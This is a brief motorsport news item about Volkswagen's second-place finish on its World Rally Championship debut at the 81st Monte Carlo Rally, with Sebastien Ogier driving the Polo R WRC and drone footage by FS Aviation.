Debutants Volkswagen Motorsport stunned the World Rally Championship paddock by securing second place on its first ever event, the 81st Monte Carlo Rally. FS Aviation was on-hand to capture some of the most memorable moments from the weekend with their drones.

Volkswagen will certainly be hoping so, following a shock second place overall on its debut rally with Loeb’s former Citroen WRC teammate Sebastien Ogier at the helm of the team’s Polo R WRC. Good pace during pre-season testing meant it was worth putting a dollar or two on a points finish for the Polo, but not many would have put their shirt on an outright podium.
